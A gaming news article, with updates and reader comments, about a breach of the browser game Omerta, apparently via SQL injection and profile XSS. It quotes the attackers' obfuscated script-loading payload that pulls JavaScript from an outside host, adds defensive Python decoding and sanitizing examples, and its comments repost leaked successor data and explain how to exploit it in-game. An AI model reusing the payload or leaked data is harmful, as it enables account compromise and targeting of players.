Last weekend Omerta had some downtime. The admins posted news that there was something wrong with the server: a hardware problem, as Brando states.
Barafranca News: Connection problems - fixed
By Brando: There was a hardware problem which was solved by switching that machine off.
We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.
Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.
Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.
In reality, hackers had access to Omerta's database. Due to the lack of proper coding on the hitlist page, the hackers were able to run a "query" and got into Omerta's database.
Result? All the information you could wish for "could" have been downloaded. This includes: successors, bullet amounts, passwords (MD5 hashed), emails, testaments... everything!
After Brando's news post, the hackers got kind of "pissed/annoyed" that the admins were trying to cover up what was happening and decided to go public with the information.
They wrote a small tool which would change all profiles ingame, about the same thing that happened versions ago (Stidda <-> Barafranca).
They reached about 800 profiles before it got noticed, and the admins disabled images on profiles again.
Barafranca News: Removed Img(s)
onLoad=m=document.createElement(String.fromCharCode( 115,99,114,105,112,116));m.src=String.fromCharCode( 104,116,116,112,58,47, 47,97,46,105,116,115,114,46,114, 117,47,107,110,97,115,50,46,106,115);document.getElementsByTagName( String.fromCharCode(104,101,97,100))[0].appendChild(m)
Translation:
Once the page has been loaded, create a script element, set its source to http://a.itsr.ru/knas2.js and append it to the document head, so the browser fetches and runs that remote file.
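To show how a fragment like the one quoted above is de-obfuscated during triage, here is an added Python example; it is not code from this site, from Omerta or from the attackers. It replaces each String.fromCharCode(...) call with the string it builds and then lists the remote URLs the decoded source references. The sample input is the quoted fragment, embedded as a constructed string, and the function names are the example's own.

```python
import re

# Constructed sample: the obfuscated fragment quoted in the article, kept here so the
# decoder can be checked against the translation given in the article.
SAMPLE_PAYLOAD = (
    "onLoad=m=document.createElement(String.fromCharCode( 115,99,114,105,112,116));"
    "m.src=String.fromCharCode( 104,116,116,112,58,47, 47,97,46,105,116,115,114,46,114,"
    "117,47,107,110,97,115,50,46,106,115);"
    "document.getElementsByTagName( String.fromCharCode(104,101,97,100))[0].appendChild(m)"
)

# Matches String.fromCharCode(...) with a list of decimal code points inside;
# the \s tolerates the stray whitespace that survives copy/paste from a web page.
_FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")

# Absolute http(s) URLs in the decoded text; stops at quotes, whitespace and angle brackets.
_URL = re.compile(r"https?://[^\s\"'<>]+")


def decode_fromcharcode(js: str) -> str:
    """Replace every String.fromCharCode(...) call with a double-quoted string literal."""

    def _repl(m: re.Match) -> str:
        codes = [int(c) for c in m.group(1).replace(" ", "").split(",") if c]
        text = "".join(chr(c) for c in codes)
        # Escape backslashes and quotes so the result is still a valid JS literal.
        return '"' + text.replace("\\", "\\\\").replace('"', '\\"') + '"'

    return _FROMCHARCODE.sub(_repl, js)


def loaded_urls(js: str) -> list:
    """Return the http(s) URLs a payload references once de-obfuscated."""
    return _URL.findall(decode_fromcharcode(js))


def summarise(js: str) -> dict:
    """Triage view: decoded source, remote URLs, and whether a <script> element is built."""
    decoded = decode_fromcharcode(js)
    return {
        "decoded": decoded,
        "remote_urls": loaded_urls(js),
        "creates_script_element": 'createElement("script")' in decoded,
    }


if __name__ == "__main__":
    report = summarise(SAMPLE_PAYLOAD)
    print(report["decoded"])
    print("remote files loaded:", report["remote_urls"])
```

The decoder only handles the decimal form used here; a fuller triage tool would also unpack hex escapes and unescape()/atob() wrappers, but the point is the same: resolve the literal before deciding what the payload loads, and block or monitor the resulting hosts rather than the obfuscated bytes.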
This script loaded an unknown JavaScript file onto the profiles, which could have been used to cause harm once an affected profile was viewed. Unfortunately, we don't have that JavaScript file, and thus cannot analyse the rest of the hackers' intentions.
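As an added example of the server-side hardening that stops this class of profile injection (this is not Omerta's code; it assumes that profiles accepted user-supplied HTML such as <img> tags, which the onLoad= fragment above suggests), the following Python allow-list sanitizer keeps only a few tags and attributes, drops every on* event handler, refuses non-http(s) image sources and discards <script> bodies. The sample markup and the example.invalid host are constructed for the example.

```python
from html import escape
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import urlsplit

# Allow-list: tag -> attributes that survive. Event handlers (on*) are never listed,
# so an injected onload/onerror can't reach the rendered profile page.
ALLOWED_TAGS = {
    "img": {"src", "alt", "width", "height"},
    "b": set(),
    "i": set(),
    "br": set(),
}
VOID_TAGS = {"img", "br"}

# Constructed sample (hypothetical host example.invalid): an image carrying a script-loading
# handler in the style of the quoted fragment, a raw script tag, and harmless formatting.
SAMPLE_PROFILE = (
    '<img src="http://example.invalid/pic.png" '
    'onload="m=document.createElement(\'script\');m.src=\'http://example.invalid/x.js\';'
    'document.head.appendChild(m)">'
    "<script>alert(1)</script><b>Don of Example</b>"
)


def _safe_url(value: str) -> bool:
    """Only absolute http(s) URLs may be used as image sources (no javascript:, data:, ...)."""
    return urlsplit(value.strip()).scheme.lower() in ("http", "https")


class ProfileSanitizer(HTMLParser):
    """Rebuild markup from the allow-list; everything else is dropped or text-escaped."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out = []          # output fragments
        self.dropped = []      # (tag, attr) pairs removed; attr is None for a dropped tag
        self._skip_depth = 0   # >0 while inside a disallowed container such as <script>

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append((tag, None))
            if tag not in VOID_TAGS:
                self._skip_depth += 1
            return
        kept = []
        for name, value in attrs:   # HTMLParser lower-cases names, so onLoad -> onload
            value = value or ""
            if name not in ALLOWED_TAGS[tag] or name.startswith("on"):
                self.dropped.append((tag, name))
            elif name == "src" and not _safe_url(value):
                self.dropped.append((tag, name))
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag not in ALLOWED_TAGS:
            if tag not in VOID_TAGS and self._skip_depth:
                self._skip_depth -= 1
        elif tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._skip_depth == 0:   # script bodies are discarded, ordinary text is escaped
            self.out.append(escape(data))


def sanitize_profile(markup: str):
    """Return (safe_markup, dropped); dropped is what was removed, suitable for logging."""
    p = ProfileSanitizer()
    p.feed(markup)
    p.close()
    return "".join(p.out), p.dropped


if __name__ == "__main__":
    safe, dropped = sanitize_profile(SAMPLE_PROFILE)
    print(safe)
    print("dropped:", dropped)
```

The dropped list is the detection hook: a sudden run of profile saves that strip an onload or a <script> tag is exactly the signal that would have flagged a mass-rewriting tool long before it reached hundreds of profiles, and it costs nothing beyond a log line per save.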
Update:
We have now heard that the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup all at once on those profiles.
Update:
As further proof, the hackers have released a list of 515 users with their set testament.
They also released the global vars of the Barafranca server.
Update 28/09:
After six days of silence in the Admins' latest news section and ignoring our invitation to comment on this article with the story from the admins' point of view, the crew of this site has been glined for an undefined amount of time with the message to "contact Brando". Also ingames of our crew have been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.
Later that day, a statement was released on Omerta in which Bramblerose states that last Thursday testament info was indeed obtained through an XSS exploit. Today they have taken measures to protect the players whose data was obtained.
They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, the global server variables leak or the profiles infected with JavaScript code.
Update:
One of the hackers has spread a link through our comments which shows a list of family names followed by two lists of user IDs, the successors of the corresponding families at the time of the hack, which is yet more proof that the database was completely accessible.
Update 30/09:
We're sorry for connecting the downtime with the hacks; we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by claiming they had hardware problems, and thus we retract this accusation.
We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article, and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused the Omerta crew extra worries or forced them to spend more time on damage control.
Anonymous (20:55:33 - 28-09)
Maybe a stupid question, but I don't really understand: what happened and what effect does it have?
Anonymous (20:55:24 - 28-09)
Anonymous at 20:49:13 on 28/09:
how do you know ?
a lot can change in 2 weeks ? so how do you know that the list (which seems correct because most of the named successors are members of the fam, and brug) is not right ? unless you know all the successors ?
all the same, old setting from a longer time ago
Anonymous (20:54:23 - 28-09)
Anonymous at 20:48:20 on 28/09:
Its 2 weeks like the guy said. It was 100% correct back then.
Anonymous at 20:41:37 on 28/09:
isn't correct 100% :)
it isn't
my famlog doesn't lie at all
successor ID doesn't confirm with the successor, even not before those 2 weeks,
these stats are like correct for here when I go back much further back than 2 weeks
Anonymous (20:49:13 - 28-09)
how do you know ?
a lot can change in 2 weeks ? so how do you know that the list (which seems correct because most of the named successors are members of the fam, and brug) is not right ? unless you know all the successors ?
Anonymous (20:48:20 - 28-09)
Anonymous at 20:41:37 on 28/09:
isn't correct 100% :)
Its 2 weeks like the guy said. It was 100% correct back then.
Anonymous (20:06:10 - 28-09)
Ilimitada
First: Blade
Second: Seymour
Righelli
First: Psychogrll
Second: Kiff
Xzone
First: Darude
Second: Shang
Blacksea
First: Bdback
Second: Hatchet
Cogere
First: Yap
Second: Audiowaste
There, that's the top 5.
That took maybe 3-4 minutes tops.
You get the idea, and I'm sure some top mentioned above can verify this info as real.
You could get a complete list within an hour or so, if you cared enough.
Omerta got hacked, period.
Anonymous (19:57:32 - 28-09)
Just for the ones that don't understand it:
Those IDs are player IDs, for example:
Fam nr 2 on the list, Resistance, has no valid first successor and the second successor is the player with the ID 234279.
Now, when we run that same number ingame it becomes:
http://www.barafranca.com/user.php?idn=234279
Which results to:
User: Bulykin / (Add to your friends list) / Action / History
Rank: Bruglione
Honour points: 885
Status Alive and online in the past 5 minutes (3d 15h 25m total)
Sottocapo of: Resistance
As a result, shooting that Bulykin account and then the Don of said fam will cause the fam to go down, if the successors haven't been altered since the list was produced.
It's done Brando, game over.
No more hide and seek time, time to step up and take this shit like a man.
You blamed pretty much every other single fail in the past on people that have either quit or got fired already, but this time its you that has to take the hit directly.
rkellylovespee (19:52:26 - 28-09)
Ha. Good thing I use a junk email and a password that isn't linked to anything else for this shit game. Good job Omerta \o/
Anonymous (19:38:42 - 28-09)
Anonymous at 19:35:34 on 28/09:
http://pastebin.com/qqZq443V
let it be known ~~
This is the final nail in the coffin of Brando spreading bullshit about the DB not being breached and that info only being gained through XSS.
DB was hacked.
Anonymous (18:47:53 - 28-09)
@ Steve/Brando: These ranting fits do nothing but alienate the community that (through donations) helps feed your family. Why not start treating this community as the paying customers we are? Of course there are two sides to every story and I also get tired of the flaming etc... but the latest outbursts on this site along with a history of poor communication have simply alienated your customer base. I stopped donating and only log in for nostalgic reasons - not because I am tired of the game or the friends I have made here but because I will not continue to buy a product with inconsistent service and care. That is my only but very significant power as a consumer. The community is all that is keeping your business alive at the moment. You offer a service and consumers have expectations. This hardly matches up anymore. You and your crew have years of "abusive" (strong word hence the "") behavior towards your customers to rectify and it is just not happening. I became a fan of your proactive approach to scripting but you are lacking an engaged and consistent group of community managers. And you need to refill that prescription of Valium. Talk to your community. Don't treat us like vermin. Make me a customer again.
Just my advice from one business mind to another.
@ Rix and crew: You derelicts! Keep it up and keep it honest. :)
Gigollo (I would not have posted Anonymous if I could just remember that %@&!* password)
Rix (17:15:09 - 28-09)
Soph at 17:09:08 on 28/09:
Time for an update on this article? When dictators silence the media, the media hits back! There ought to be a way to get the community to listen! :)
Soph (17:09:08 - 28-09)
Time for an update on this article? When dictators silence the media, the media hits back! There ought to be a way to get the community to listen! :)
Smul (16:46:56 - 28-09)
FU RIX SBANKS! :@:@:@:@ now I'm frozen for the first time ever :( because of you fucking fagfaces
I hatez you :(
oke lies :$
loverboy (16:14:18 - 28-09)
Rix at 15:34:06 on 28/09:
Hmm you're right, it's 515. Dunno why Sbanks said 100.
Anonymous at 15:28:27 on 28/09:
Btw its posted over 500 on that list, not 100, counted it roughly.
RIP rix for doing your job...
sad to see all this,
great job done always, and now this....
says how low the crew can go with their power abuse :)
loverboy (16:12:16 - 28-09)
VERY VERY VERY SAD admins :')
g-lining, a-killing...
nice nice nice,
too dumb to accept your faults, only making everything worse by doing all this :')
game was already half dead bcs of your 'new' things,
crew wasn't that popular anymore,
now you guys all made your move that screwed it all i guess